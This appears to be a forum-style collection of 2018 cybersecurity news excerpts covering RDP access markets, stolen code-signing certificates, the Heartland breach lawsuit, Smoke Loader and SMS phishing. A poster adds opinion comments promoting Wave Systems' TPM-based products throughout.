Black market sellers gain RDP credentials by scanning the internet for systems that accept RDP connections, and then use tools like Hydra, NLBrute and RDP Forcer to attack the login using stolen credentials and password dictionaries. Once they successfully log into the remote PC, they don’t do anything but put the connection details up for sale.
After hackers pay for a connection, they can bring a corporation down to its knees. For instance, a hacker could pay a mere $10 for a connection, infiltrate the network to encrypt the files of every PC, and demand a $40,000 ransom. Compromised PCs can also be used to deliver spam, misdirect illegal activity and mine cryptocurrency. Access is also good for stealing personal information and company trade secrets.
“We found a newly posted Windows Server 2008 R2 Standard machine on the UAS Shop,” Fokker writes. “According to the shop details, it belonged to a city in the United States and for a mere $10 we could get administrator rights to this system. UAS Shop hides the last two octets the of the IP addresses of the systems it offers for sale and charges a small fee for the complete address.”
The solution, according to McAfee, is that organizations need to do a better job at checking all their virtual “doors and windows” so hackers can’t sneak in. Remote access should be secure and not easily exploitable.
Stolen certificates from D-Link used to sign password-stealing malware
Wave VSC 2.0 - https://www.wavesys.com/products/wave-virtual-smart-card
Wave Endpoint Monitor - https://www.wavesys.com/malware-protection
https://arstechnica.com/information-technology/2018/07/stolen-certificates-from-d-link-used-to-sign-password-stealing-malware/
This isn't the IP camera software you think it is.
Criminals recently stole code-signing certificates from router and camera maker D-Link and another Taiwanese company and used them to pass off malware that steals passwords and backdoors PCs, a researcher said Monday.
The certificates were used to cryptographically verify that legitimate software was issued by D-Link and Changing Information Technology. Microsoft Windows, Apple’s macOS, and most other operating systems rely on the cryptographic signatures produced by such certificates to help users ensure that executable files attached to emails or downloaded on websites were developed by trusted companies rather than malicious actors masquerading as those trusted companies.
Somehow, members of an advanced persistent-threat hacking group known as BlackTech obtained the certificates belonging to D-Link and Changing Information Technology, the researcher with antivirus provider Eset said in a blog post. The attackers then used the certificates to sign two pieces of malware, one a remotely controlled backdoor and the other a related password stealer. Both pieces of malware are referred to as Plead and are used in espionage campaigns against targets located in East Asia. The Japan Computer Emergency Response team recently documented the Plead malware here. AV provider Trend Micro recently wrote about BlackTech here.
“The ability to compromise several Taiwan-based technology companies and reuse their code-signing certificates in future attacks shows that this group is highly skilled and focused on that region,” Eset researcher Anton Cherepanov wrote in Monday’s post.
Don’t try this at home
In a support announcement, D-Link officials said that two separate code-signing certificates were recently misappropriated by a “highly active cyber espionage group.” The post said most D-Link customers won’t be affected by the theft, but it also suggested some people may experience errors when viewing mydlink IP cameras within Web browsers. Company engineers are in the process of releasing updated firmware to fix the errors. People using mydlink mobile applications aren’t affected.
Both D-Link and Changing Information Technology have revoked the stolen certificates. Until the D-Link firmware is issued, the company’s support announcement is advising people who want to use browsers to view their affected D-Link cameras to temporarily ignore the certificate revocation warnings. This is bad advice that could be abused by malware operators. Users should disregard it.
The best-known example of malware that abused stolen code-signing certificates was the Stuxnet worm that targeted Iran’s nuclear enrichment program almost a decade ago. The malware used legitimate certificates belonging to RealTek and JMicron which are both, like D-Link and Changing Information Technology, known technology companies based in Taiwan.
Last year, researchers published research that showed that malware signed by OS-trusted code-signing certificates was more common than most people assumed, with the first known instance occurring in 2003. Earlier this year, researchers documented several underground services that sold counterfeit signing credentials that are unique to each buyer. The thefts reported Monday are an indication misappropriated certificates remain a widely used technique for concealing malicious software.
Stolen Taiwanese Certs Used in Malware Campaign
https://www.infosecurity-magazine.com/news/stolen-taiwanese-certs-used/?utm_source=dlvr.it&utm_medium=twitter
Security researchers have discovered yet another cyber-attack campaign using stolen certificates to circumvent traditional security tools.
The tactic was being used to launch a remotely controlled backdoor dubbed Plead and a related password stealer, according to Eset senior malware researcher, Anton Cherepanov.
Plead was spotted last year being used by a group known as BlackTech to compromise targets in East Asia including Hong Kong, Japan and Taiwan, and as such could be a Beijing-backed venture.
Two certificates were used to sign the malware, one belonging to Taiwanese security company Changing Information Technology and another issued by D-Link.
“We spotted this malware campaign when our systems marked several files as suspicious. Interestingly, the flagged files were digitally signed using a valid D-Link Corporation code-signing certificate. The exact same certificate had been used to sign non-malicious D-Link software; therefore, the certificate was likely stolen,” explained Cherepanov.
After being notified of the discovery, D-Link revoked the certificate last week, he added.
However, BlackTech is still using the Changing Information Technology certificate, despite it also having been revoked last week.
Kevin Bocek, chief cybersecurity officer at Venafi, pointed out that the use of stolen certificates is not new and was in fact popularized by the Stuxnet authors.
“If you steal trusted machine identities from global technology companies, you can execute highly effective attacks that don’t raise any alarms. This is just one more demonstration of how machine identities, in this case code signing certificates, are being abused by malicious actors. There’s no doubt we’re going to see a lot more of these attacks in the future,” he added.
“Code-signing certificates are often a core component of DevOps and cloud infrastructure; and because organizations are using a lot more machine identities, these risks will only grow. In fact, researchers are already seeing a dramatic rise in the trade of stolen code-signing certificates on the dark web.”
Security Firm Sued for Failing to Detect Malware That Caused a 2009 Breach
If the cyber-insurance companies (Eg AXA) properly incentivized businesses to use superior cybersecurity with companies such as Wave Systems (wavesys.com), these types of lawsuits mentioned in the article could be avoided. imo.
https://www.bleepingcomputer.com/news/security/security-firm-sued-for-failing-to-detect-malware-that-caused-a-2009-breach/
Two insurance companies are suing a cyber-security firm to recover insurance fees paid to a customer after the security firm failed to detect malware on the client's network for months, an issue that led to one of the biggest security breaches of the 2000s. The security firms says the lawsuit is meritless.
The two insurance firms are Lexington Insurance Company and Beazley Insurance Company, and both insured Heartland Payment Systems, a leading payment processing company.
Lawsuit related to 2009 Heartland mega breach
In January 2009, Heartland announced a major security breach of its network, following which an attacker stole details for over 100 million payment cards stored on its systems by over 650 of Heartland's customers.
Following this devastating hack and one of the biggest of the 2000s, Heartland paid over $148 million in settlement fees for various lawsuits, and other remediation costs and expenses Heartland owed its customers.
As part of their insurance agreements, the two firms paid $30 million to Heartland in the hack's aftermath, with the Lexington Insurance Company footing a $20 million bill, and the Beazley Insurance Company paying another $10 million.
Lawsuit claims Trustwave failed to detect intrusion
But now, according to a civil lawsuit filed on June 28 in Illinois, and first reported by the Cook County Record, the two companies are trying to recover those costs, and are claiming that the security firm with which Heartland had a service contract had failed to honor its agreement.
The two insurance firms claim that Chicago-based Trustwave Holdings, Inc. —the security firm— had failed to detect that an attacker used an SQL injection attack to breach Heartland's systems on July 24, 2007.
Furthermore, the two say Trustwave also failed to detect that attackers installed malware on the payments processor's servers on May 14, 2008, and did not raise a sign of alarm about the event.
The lawsuit points out that Trustwave did not detect any signs of suspicious activity during its security audits it provided Heartland for almost two years as part of its contracts, which also included testing for PCI DSS compliance and attestation.
Visa report suggests Trustwave's fault
The lawsuit also mentions that in the aftermath of the hack, Visa conducted a review of Heartland's servers and found that Trustwave incorrectly certified Heartland as PCI DSS compliant. PCS DSS stands for Payment Card Industry Data Security Standard, an attestation every vendor must obtain before being allowed to handle credit card data.
The lawsuit claims that Visa discovered that Trustwave ignored the fact that Heartland didn't run a firewall, was using vendor-supplied passwords, didn't have sufficient protection for the storage system used for card data, failed to assign unique identification to each person accessing its system, and had failed to monitor servers and cardholder data at regular intervals.
All of these are PCI DSS compliance rules, and Visa said that despite all the problems on Heartland's network, Trustwave provided PCI DSS attestation. Visa later prohibited Heartland from employing Trustwave following the wrongful attestation.
Citing the Visa report and other post-breach documents, the two insurance firms claim that Trustwave is guilty of gross negligence. Furthermore, the lawsuit claims that Trustwave is also in breach of the contracts it signed with Heartland, for which it was supposed to provide security services. The two insurance firms are now asking for damages of at least $30 million, pending a jury trial, following Trustwave's failure to detect the intrusion.
Trustwave denies fault, says it's an old story
But in a statement to Bleeping Computer, Trustwave says the lawsuit is meritless.
"Trustwave filed a lawsuit in Delaware against insurers Lexington and Beazley in response to their time-barred and unwarranted attempt to recoup the insurance payments they made as coverage for a 2008 data breach at Heartland," a Trustwave spokersperson told us. "The insurers subsequently filed a duplicative suit in Illinois regarding the exact same matter."
"Trustwave provided Heartland with an assessment of its compliance with PCI DSS. However, such an assessment, as the contract at issue makes clear, in no way guarantees that the company examined has not or cannot be breached," the spokesperson added.
"Trustwave did not manage Heartland's information security, and at no time did Heartland assign blame for the breach or make any claim against Trustwave. The insurers' demand related to a decade-old breach is entirely without merit. Trustwave initiated the lawsuit in order to obtain a resolution of these baseless demands and intends to pursue this matter vigorously."
Trustwave was sued before in similar cases
This is the third time Trustwave is on the receiving end of such a lawsuit. A banking conglomerate sued Trustwave in 2014 for its role in the Target breach, but the lawsuit was dropped after a few days when it was discovered that Trustwave was not responsible for securing Target's payment card data, and hence, not at fault.
Trustwave was sued for a second time in 2016 when a casino operator claimed the security firm failed to contain and eradicate a 2013 breach of its payment system. The lawsuit claims Trustwave missed a second breach that later allowed a crook to steal over 300,000 payment card details from the casino operator's customers. This lawsuit is ongoing.
Senate Panel Announces Hearing on Computer Chip Flaws
Why not use the TPM to store sensitive data instead of having to continuously PATCH for Spectre and Meltdown? That method doesn't seem to be working and getting all new processors would take years to be absorbed into the market.
http://thehill.com/policy/cybersecurity/395878-senate-panel-announces-hearing-on-computer-chip-flaws
Netflix's Latest Price Test Could Be Bad News for Password Sharers
Wavexpress (Wave subsidiary) has closed up shop for quite some time but it is still an interesting technology in that the TPM could be a good device identifier for Netflix. imo. Steve Sprague years ago had indicated that cable was no longer being stolen due to hardware security. Maybe Netflix could license some of Wavexpress's technology given their new testing indicated in the article below.
https://www.thestreet.com/opinion/netflix-price-test-could-be-bad-news-for-password-sharers-14642914
The streaming giant is testing a pricing overhaul that would lower the number of simultaneous streams that are supported by two of its plans. That could give a lift to subscriptions and average prices.
It's an open secret that many Netflix (NFLX - Get Report) subscribers "share" their login credentials with friends and/or relatives.
If recent European tests are any sign, the streaming giant is finally thinking about cutting down on the behavior, by lowering the number of simultaneous streams supported by what are currently its two most expensive plans. And though such a move naturally risks sparking a consumer backlash, it could also provide a lift to Netflix's subscriber growth and average selling prices (ASPs) in the U.S. and some other developed markets.
Earlier this week, CordCutting.com and Italian site TuttoAndroid reported that Netflix is testing a pricing overhaul in European markets in which the company would launch an "Ultra" subscription plan that has the features of its current Premium plan, which costs €14 ($16.35) per month in a slew of European markets and $14 per month in the U.S. Like the current Premium plan, the Ultra plan lets accounts play up to four streams at the same time in either HD or (if a particular show or movie supports it) 4K resolution.
Notably, the Ultra plan is priced at €17 ($19.86) per month in the test. The Premium plan is still being offered, but only supports two simultaneous streams instead of the four that Premium subs currently enjoy. And Netflix's popular Standard plan -- which costs €11 ($12.85) or $11 per month in the U.S. and supports HD (but not 4K) streaming -- only supports one stream in the test, rather than the current two.
Users seeing the test aren't witnessing any changes to Netflix's Basic plan: It still costs €8 ($ 9.34) per month in Europe and $7.99 in the U.S. and supports one standard-definition stream.
A Netflix spokeswoman confirmed the test to CNET. "In this case, we are testing slightly different price points and features to better understand how consumers value Netflix," she said.
Clearly, if Netflix rolled out the pricing revamp on a large scale, Standard and (to some extent) Premium subs who are sharing their login credentials with other households would need to either think twice about doing so, or upgrade to a more expensive plan. And judging by both surveys and anecdotal evidence, the number of Netflix subs faced with that dilemma could be meaningful.
Last year, a U.S. Reuters survey found that 12% of adult streaming viewers admitted to "using an account/log-in information that belongs to someone outside your house." Among consumers aged 18 to 24, the figure rose to 21%. Assuming that some consumers were embarrassed to admit to such activity, Reuters's survey numbers might slightly understate how prevalent it is.
To date, Netflix has avoided cracking down on password-sharing, arguing that doing so risks snaring consumers engaged in "legitimate" sharing (for example, subscribers who share their log-ins with spouses or children). Lowering the number of streams supported by the Standard and Premium plans, though, would let the company reduce how much password-sharing occurs without engaging in a case-by-case crackdown that upsets "legitimate" sharers caught up in it.
And that, in turn, could drive an uptick in subscriptions among consumers borrowing someone else's login credentials. This could especially be a big deal in the U.S. -- both because of how common password-sharing has become here, and because high penetration rates have begun impacting its U.S. subscriber growth.
There are an estimated 126 million households in the U.S., and Netflix expects to end Q2 with 57.9 million U.S. streaming subscriptions. Exclude households that lack Internet access and/or can't afford Netflix, and the company's U.S. penetration rate is likely over 50% even before accounting for households using borrowed credentials. In addition, a December 2016 comScore survey found that 75% of U.S. Wi-Fi-connected homes subscribing to one or more over-the-top (OTT) streaming services included Netflix among them.
All of this makes it a good time for Netflix to try and coax U.S. password-borrowers to get their own subscriptions. Meanwhile, Netflix's very high customer satisfaction rates and still-reasonable pricing arguably position it well to convince households that need support for two or more simultaneous streams to keep their various Netflix-viewing members satisfied to sign up for a costlier plan.
Such upgrade activity would provide a fresh boost to Netflix's average selling price (ASP). With the help of the price hikes carried out last fall, Netflix's global ASP rose 14% annually in Q1, with 12% growth recorded in the U.S.
There is, of course, a risk that a broad rollout of Netflix's pricing overhaul in developed markets -- judging by how its latest price hike was rolled out, there's a good chance that Netflix will be more cautious in price-sensitive emerging markets -- would anger many consumers who have come to take their plan's support for two or four simultaneous streams for granted. However, with Netflix's plans remaining far cheaper than a typical pay-TV plan, and surveys indicating the company still has a fair amount of headroom to hike prices, the backlash might not be too severe.
Time will tell whether the pricing overhaul that Netflix is experimenting with in Europe becomes something more than a test. But either way, the fact that Netflix is even considering such a move speaks volumes about how confident the company remains about its pricing power and customer loyalty as Amazon.com (AMZN - Get Report) , Disney (DIS - Get Report) and others take their best shots at the streaming video giant.
PIN vs Password in Windows 10 – Which offers better security?
https://www.wavesys.com/products/wave-virtual-smart-card
Excerpt:
The user experience with a virtual smart card is simple: he or she logs in with a PIN (authentication factor number one). The TPM (authentication factor number two) then transparently identifies the device to the network and connects the user to all the approved services. It’s one less thing for users to carry around.
https://www.thewindowsclub.com/pin-vs-password-in-windows-10
Windows 10 introduced Windows Hello allowing users to sign in to their device using the PIN or biometric identification. It revolutionized the concept of system security, bringing it to a level that no system could be hacked remotely. However, Windows 10 also allows users to use the Password to log in. So which offers better security?
PIN vs Password in Windows 10
What is a Password?
A Password is a secret code which is stored on a server and can be used to access your account from any location, at least when speaking of computer-related accounts. Now they say that since servers have their own Firewalls which are powerful enough, these passwords cannot be hacked. However, this is untrue. A cyber-criminal doesn’t need to specifically access the server to figure out the password. Keylogging, phishing, etc. are a few of the known techniques to hack a person’s password without interfering with the server itself.
No matter how the password has been acquired, the intruder now has access to the user’s accounts from anywhere he/she chooses to access. One exception is if the user whose account was compromised was using a company based login where the information is stored in an active directory. In such a case, the hacker would have to access the original user’s account through any other system which is on the same network, which is difficult, though still possible.
Here’s where the concept of the PIN and biometric identification come to use. Windows Hello PIN and biometric identification are system specific. They are not stored on any server. While these logon types are not a substitute for a password, they are seemingly unhackable unless the cyber-criminal steals the device itself.
What is a PIN?
A PIN is an easy secret login code to login to your device. It is usually a set of number (mostly 4-digits), though some companies might allow their employees to use PINs with letters and special characters.
A PIN is tied to the device
A PIN is not stored on any server and is device specific. This means that if someone finds out your system’s PIN, the intruder would be able to get nothing out of it unless he/she steals the device as well. The PIN cannot be used on any other device belonging to the same person.
A PIN is backed up by TPM hardware
A Trusted Platform Module (TPM) is a hardware chip that has special security mechanisms to make it tamper proof. It has been made such that no known software attacks can hack it. Eg. PIN-brute force won’t work since the TPM gets locked.
How PIN backed up with TPM works if someone steals your laptop?
Ideally, it would be an extremely rare case that a cybercriminal is able to steal your laptop and spoof its PIN, but well, considering that it’s possible, TPM uses anti-hammering mechanism to block the PIN after repeated wrong attempts. If your device does not have TPM, you can use BitLocker to limit the number of failed sign in attempts, using the Group Policy Editor.
Why do users need to set a PIN before using biometric identification?
Be it a fingerprint, the retina of the eye or speech, injury on the body part used for biometric identification might lead to your device getting locked. Since people have a habit of not setting PINs unless forced to, Microsoft made it mandatory to set one before creating biometric identification.
Which is better among PIN and Password?
Honestly, this is a question that cannot be answered straight away. A PIN cannot be used for single sign-on structures like a password. A password is insecure and even known attacks like phishing and keylogging cannot protect systems if the password is hacked. Usually, servers offer extra protection like 2-step authentication and IT departments in companies help change the password or block accounts the second they figure out that the password has been compromised. So the choice is yours – but generally speaking, a PIN does offer more security.
This password-stealing malware just added a new way to infect your PC
See Wave VSC 2.0 at wavesys.com for a product that could help this situation in a BIG WAY. imo. Wave Endpoint Monitor (see wavesys.com as well) could also have a positive impact on this situation.
https://www.zdnet.com/article/this-password-stealing-malware-just-added-a-new-way-to-infect-your-pc/
One of the new tactics by the malware involves an injection technique not seen in the wild until just days ago
A powerful form of malware which can be used to distribute threats including Trojans, ransomware and malicious cryptocurrency mining software has been updated with a new technique which has rarely been seen in the wild.
Distributed in spam email phishing campaigns, Smoke Loader has been sporadically active since 2011 but has continually evolved. The malware has been particularly busy throughout 2018, with campaigns including the distribution of Smoke Loader via fake patches for the Meltdown and Spectre vulnerabilities which emerged earlier this year.
Like many malware campaigns, the initial attack is conducted via a malicious Microsoft Word attachment which tricks users into allowing macros, enabling Smoke Loader to be installed on the compromised system and allowing the Trojan to deliver additional malicious software.
Researchers at Cisco Talos have been tracking Smoke Loader for some time and have seen its latest campaigns in action. One of the current preferred payloads is TrickBot -- a banking Trojan designed to steal credentials, passwords and other sensitive information. Phishing emails distributing the malware are designed to look like invoice requests from a software firm.
What intrigued researchers is how Smoke Loader is now using an injection technique which hadn't been used to distribute malware until just days ago. The code injection technique is known as PROPagate and was first described as a potential means of compromise late last year.
This technique abuses the SetWindowsSubclass function -- a process used to install or update subclass windows running on the system -- and can be used to modify the properties of windows running in the same session. This can be used to inject code and drop files while also hiding the fact it has happened, making it a useful, stealthy attack.
It's likely that the attackers have observed publically available posts on PROPagate in order to recreate the technique for their own malicious ends.
Those behind this process have also added anti-analysis techniques to complicate forensics, runtime AV scanners, tracing, and debugging that any researchers may attempt to conduct on the malware.
While there's still plenty of Smoke Loader attacks which look to deliver additional malware to compromised systems, in some cases the malware is being equipped with its own plug-ins to go straight onto performing its own malicious tasks.
Each of these plugins are designed to steal sensitive information, specifically stored credentials or sensitive information transferred over a browser -- the likes of Firefox, Internet Explorer, Chrome, Opera, QQ Browser, Outlook, and Thunderbird can all be used to steal data.
The malware can even be injected into applications like TeamViewer, potentially putting the credentials of others on the same network as the infected machine at risk too.
It's possible that Smoke Loader has been equipped with these tasks because its operators aren't currently getting much business in response to adverts on dark web forums advertising their ability to install other types of malware onto their compromised network of machines. It could also just be a means of taking advantage of the botnet for their own purposes.
Either way, it indicates that organisations must remain vigilant against potential threats.
"We have seen that the trojan and botnet market is constantly undergoing changes. The players are continuously improving their quality and techniques. They modify these techniques on an ongoing basis to enhance their capabilities to bypass security tools. This clearly shows how important it is to make sure all our systems are up to date," wrote Cisco Talos researchers.
"We strongly encourage users and organizations to follow recommended security practices, such as installing security patches as they become available, exercising caution when receiving messages from unknown third parties, and ensuring that a robust offline backup solution is in place. These practices will help reduce the threat of a compromise, and should aid in the recovery of any such attack," they added.
UK CEOs believe cyber attacks are inevitable
A better, cost effective and unique set of cybersecurity products could prevent these cyber attacks from happening: see wavesys.com imo.
http://www.itpro.co.uk/security/31431/uk-ceos-believe-cyber-attacks-are-inevitable
KPMG survey finds that four in ten UK company bosses believe they will be targeted by cyber criminals
Four in ten UK CEOs believe it's no longer a case of "if" a cyber attack will happen as it is now an inevitability, according to research from KPMG.
The professional services firm surveyed 150 UK leaders and a further 1,150 CEOs from around the world about their future investment plans and the challenges facing their companies.
The results showed that 39% of UK CEOs believed that they will be targeted by a cyber attack. The percentage was higher globally, with almost half of international CEOs feeling the same way.
Bernard Brown, vice chair at KPMG in the UK, said that the findings show how high up the agenda cybersecurity has become for businesses.
"The seeming inevitability of a cyber attack crosses all borders and has now crossed firmly over the threshold for the board-level discussions," he said.
"Protecting the business from a cyber attack has jumped further up the boardroom agenda and we are seeing businesses making their defences the best they can be."
The survey found that UK business leaders believe that a strong cybersecurity strategy is critical to engendering trust with key stakeholders, with 74% agreeing that cybersecurity is an enabler of trust, compared to 55% of global CEOs.
According to the report, cyber awareness amongst UK leaders is changing, with 39% believing that their organisations are either "very well" or "well" prepared for a future cyber attack.
CEOs also believe that cybersecurity specialists are an effective part of the business with 45% of UK CEOs seeing their value, coming second to data scientists who are seen as being effective by 62% of the CEOs asked.
"It's encouraging to see that CEOs are developing a more mature understanding of what cyber security actually means. They are beginning to ask more awkward and searching questions of their IT teams. What are the challenges that face us specifically, what risks are we carrying, what do we need to be resilient to a cyber-attack?" Brown added.
"Organisations are spending more time planning for worst case scenarios, running simulations and thinking in detail about how they would deal with the uncertainties that arise during a cyber breach."
More and more companies are becoming victims to cybercrime, in recent weeks sports brand and trainer maker Adidas suffered a data breach and could have potentially exposed the personal details of millions of its customers.
‘Couldn’t recognize that fingerprint’ Windows Hello error
There seems to be a lot of time consuming work arounds on the Windows Hello fingerprint reader technology. Seems like Wave VSC 2.0 would have had the kinks like these already worked out. Windows Hello and Wave VSC 2.0 are somewhat similar technologies.
full article at the link.
https://windowsreport.com/fix-couldnt-recognize-fingerprint/
Excerpts:
With the introduction of Windows Hello, Microsoft added a few extra security layers with a few versatile biometric options. The fingerprint scanner is commonly used, and it’s held in high regards when it comes to its security value (look at all those smartphones). Once established, you’ll be able to go past the lock screen with just a touch. However, it seems that the fingerprint recognition failed for some users and they were acquainted with the “Couldn’t recognize that fingerprint” error.
And it hardly works with the same success with other OEMs. Thus, Microsoft Hello and the accompanying sign in options display lots of bugs on Lenovo and Dell laptops. And, for that reason, you’ probably need to re-establish the fingerprint sign-in profile more times than you would like.
2: Use Local account and update Windows
The same reason. If Windows 10 update broke your fingerprint reader and it gives you the “Couldn’t recognize that fingerprint” error, you might look for alternatives. Lots of affected users managed to address the problem but, in exchange, they were able to use the fingerprint only on Local account instead of the Microsoft account.
4.Follow the instructions.
With that, we can conclude this article. We can only hope that these steps helped you resolve the “Couldn’t recognize that fingerprint” error in Windows Hello sign-in. If there is some additional information you consider useful, feel free to share it with us. The comments section is just below.
Two-Factor Inauthentication – The Rise In SMS Phishing Attacks
https://www.wavesys.com/virtual-smart-card-2.0-from-wave
https://www.wavesys.com/sites/wave/files/Wave%20Systems_Smart%20Card%202.0.pdf
https://www.informationsecuritybuzz.com/articles/two-factor-inauthentication-the-rise-in-sms-phishing-attacks/
There are countless ways to carry out a cyber attack, but for the vast majority the key is deception – typically involving identity deception in which the attacker poses as a trusted party to the intended victim.
With cyber criminals constantly on the prowl to capture passwords and other credentials, two-factor authentication (2FA) has become one of the most widely accepted backup verifications for many services and companies. While various 2FA methods are available, the humble SMS text message has emerged as a favourite as it is incredibly ubiquitous and easy to understand.
Nevertheless, SMS also contains a number of inherent flaws as a security verification method. The first problem is that 2FA doesn’t actually verify the user’s identity, only that they have access. This means that anyone with direct access to the device can pass through 2FA security measures as they can send themselves the code.
The SMS phishing menace
Thieves and fraudsters don’t need to have the device in their hands, as 2FA is also vulnerable to remote phishing. We most often think of phishing attacks as taking place over email, targeting information such as passwords, but the same tactic can very easily be applied over SMS and targeting reset codes. One particularly powerful technique is the Verification Code Forwarding Attack, or VCFA. For this approach, the criminal accesses a service provider and requests an SMS code to reset their password for a particular user. Immediately afterwards, they send a fake text message to the same user, pretending to be the service provider and asking for the code “as an additional verification measure”.
In a research experiment I conducted with colleagues at New York University, we discovered that the VCFA technique can be incredibly effective – far more so than comparable email-based phishing attacks. We enlisted more than 300 volunteers who were not aware that the experiment involved SMS phishing, and sent them a variety of different messages designed after real SMS from their email provider. The most successful message was able to fool 50 percent of recipients into giving up their authentication code, which is an impossibly high result for most forms of social engineering. By comparison, most non-targeted email-based phishing attacks have a success rate of around 1 per cent, with the very best reaching two or three percent.
Any service being breached in this way would mean severe repercussions for the victim, most obviously online payment, retail, and anything else connected to financial data. The holy grail for any attacker is to gain access to an email account, a tactic known as Email Account Compromise (EAC). While financial details can be exploited as a one-off opportunity before the bank takes action, an email account can be used in much more subtle and insidious ways.
EAC emails are far more difficult to detect than normal fraudulent messages, as they lack potential tells such as mismatched sender IDs. The good news is that they are not entirely unstoppable, and it is possible to detect and prevent an EAC email by looking even deeper into different elements associated with the identity of the legitimate user. For example, an email security system could be set up to detect details about the user agent – the device used to send the email. So, a user could normally use a Mac with a 2560 × 1600 screen resolution, while the imposter who has hijacked their account might use a PC with an 1440 x 900 resolution.
This difference can be identified through the email itself, along with other signs such as the IP address. Taken together, these clues can point to a suspicious email even when then account address is genuine. The email can then be flagged for further examination to determine if there really is a malicious actor at work, or if the CEO happens to be using his or her spouse’s PC for the afternoon.
Can 2FA be saved?
The most obvious solution to the many security flaws in SMS 2FA is to abandon the text message as a verification measure – something I expect to see happening with increasing frequency over the next year.
Although SMS 2FA is certainly on the way out, it will be some time before the change filters through all organisations thanks to its simplicity and popularity. While SMS remains so widespread and more attackers pick up on SMS phishing attacks, it is more important than ever for organisations to be aware that their workforce’s digital identities may be compromised. Enterprises must be prepared for the threat of an employee’s email being hijacked via 2FA and used to attack them from within.
Can Congress salvage a broken cyber strategy?
https://www.wavesys.com/solutions
Excerpt: Much of the complexity, stress, and expense of data protection stems from hanging on to a failed, 20th-century approach to the problem. Namely, piling on layers of software in an attempt to keep the bad guys and their viruses out. But there is no “in” to keep them out of anymore. Consider today’s increasingly mobile workforce, the proliferation of personal devices, and the growing use of web applications—all of which cyber criminals have learned to take advantage of.
The Wave alternative is to start with the device. The security is built in—part of the hardware—not added on. With the device as your foundation, you have unprecedented yet straightforward control over exactly who has access to your data, with what devices, over what networks, which eliminates much of that complexity, stress, and expense. Total cost of ownership for Wave data protection can be almost half that of a traditional software-based system.
https://www.fifthdomain.com/congress/capitol-hill/2018/06/28/can-congress-salvage-a-broken-cyber-strategy/ If the government 'really' knew about Wave, articles like the one below would be a lot more positive in its cybersecurity message. imo.
A cyberspace ambassador. An exchange program between government and private security experts. A cyber blue-ribbon commission based on nuclear age strategy.
These are among the scattershot of proposals that Congress has considered this week as lawmakers attempt to articulate a national cybersecurity strategy in the face of continued digital hostility from Russia and China.
Amid a barrage of recent criticism leveled at both the Trump and Obama administrations for a cybersecurity policy that is either entirely absent or timid, the proposed legislation is sending a message: America needs a plan. Yet in comparison to the crisp Chinese five-year plans and Russian digital assaults, the cyber plan forged by Congress appears increasingly scattershot to analysts.
“States like China and Israel have comprehensive national strategies for the cyber domain that integrate national security and economic concerns,” said Bobby Chesney, a professor at the University of Texas at Austin.
“The United States has not been nearly so strategic under either Obama or Trump, and now many Senators are doing what they can to try to force smarter strategic thinking.”
In recent negotiations with China, experts say that Trump has been willing to trade away the cybersecurity of American citizens for a friendlier business climate. And in May, the White House eliminated the position of cybersecurity coordinator. Only 13 percent of security experts believe that Congress and the White House understand the cyberthreat, according to a recent survey by the firm Black Hat.
Chesney said several provisions aim to force the administration to take a tough line in response to malicious Russian cyber activity, but he added it is hard to force action. On the other hand, Chesney supported the proposed bipartisan “Cyber Solarium Commission,” which would examine the nation’s cyber strategy.
The commission hopes to strengthen America’s cybersecurity through sociology techniques that were used during the Eisenhower administration.
Congressional staff are working this week to reconcile the defense spending bill that contains the tough language and the commission, but it is just one out of several proposals that is creating a blurred digital road-map.
A new plan for how the U.S. government should respond to state-sponsored cyberattacks was also approved in the House Foreign Affairs Committee June 28. It came one week after former President Obama’s top cyber official confirmed a report that he was ordered to “stand down” in the face of Russian digital aggression. The proposal from Rep. Ted Yoho, R-Fla., now faces a full House and Senate vote.
And amid a hollowed out State Department, a Senate committee approved the creation of a new chief cybersecurity diplomat June 26. It is a direct rebuttal of former Secretary of State Rex Tillerson, who scrapped a previous office that coordinated digital issues.
Speaking at George Washington University June 28, the president of FireEye, Kevin Mandia, laid out the challenges for protecting America’s digital infrastructure. Most of the U.S. critical infrastructure is in the private sector, according to Mandia, as opposed to other countries who have nationalized the systems that underlie their society.
“We are in a $10 million glass house and North Korea is in a mud hut with seven IP addresses,” said Mandia
340 Million Records Exposed in Exactis Breach
https://www.wavesys.com/products/wave-virtual-smart-card
Excerpt: When we say “secure”…
…we mean it. Our solution starts with a proven hardware root-of-trust. Multi-factor authentication is an established best-practice for strong authentication: the TPM-based virtual smart card is one factor (something you have) and the user PIN is a second factor (something you know).
https://www.infosecurity-magazine.com/news/340-million-records-exposed-in/?utm_source=dlvr.it&utm_medium=twitter
Another major data breach has left roughly 340 million records exposed by data aggregation firm Exactis after information was left on a publicly accessible server. The 2 terabytes' worth of data appears to include the personal details of the individuals listed, including phone numbers, home addresses, email addresses and other highly personal characteristics for every name.
The type of personal information that was potentially compromised should be concerning to consumers, given the enormous volume of information that is collected, spliced together and housed in databases such as the one that was leaked by Exactis, said Anurag Kahol, Bitglass CTO.
“Exposing that amount of data to the public internet is a significant offense by the organization and one that we’ve seen dozens of times in the past year, yet it is unlikely that we’ll see anything change unless organizations take the initiative in protecting corporate data,” Kahol said.
News of the breach raises questions about whether Exactis knew what type of information it had and whether it considered the potential implications if that information were compromised. “The problem with most enterprises today,” said Ruchika Mishra, Balbix director of products and solutions, “is that they don’t have the foresight and visibility into the hundreds of attack vectors – be it misconfigurations, employees at risk of being phished, admin using credentials across personal and business accounts – that could be exploited.”
It could be months before the real impact of the breach can be measured, but what has initially been reported is alarming and there would not be any surprise if Exactis confirmed that 340 million individuals were indeed impacted.
“The Exactis data leak should enrage consumers and businesses alike. The sheer amount of cloud databases left accessible on the Internet is astounding, especially when one considers the type and amount of data that users store on it without giving it second thought,” said John “Lex” Robinson, cybersecurity strategist at Cofense.
“It is worth noting that just because the server was left open to the public does not mean it was stolen by malicious hackers, but we cannot be certain. The data reported to have been leaked is incredibly comprehensive and can be used by hackers to develop more targeted phishing scams.”
Do employees open your network to the bad guys by using hacked passwords?
A better way for companies and governments to avoid bad password harm than what is suggested in this article imo, see:
https://www.wavesys.com/products/wave-virtual-smart-card
Excerpt: The user experience with a virtual smart card is simple: he or she logs in with a PIN (authentication factor number one). The TPM (authentication factor number two) then transparently identifies the device to the network and connects the user to all the approved services. It’s one less thing for users to carry around.
https://blog.knowbe4.com/do-employees-open-your-network-to-the-bad-guys-by-using-hacked-passwords
A whopping 25% of employees are using the same password for all logins. What if that password is available on the dark web? A massive amount of passwords are compromised due to data breaches and used by the bad guys for attacks. Are any hacked passwords in use within your organization?
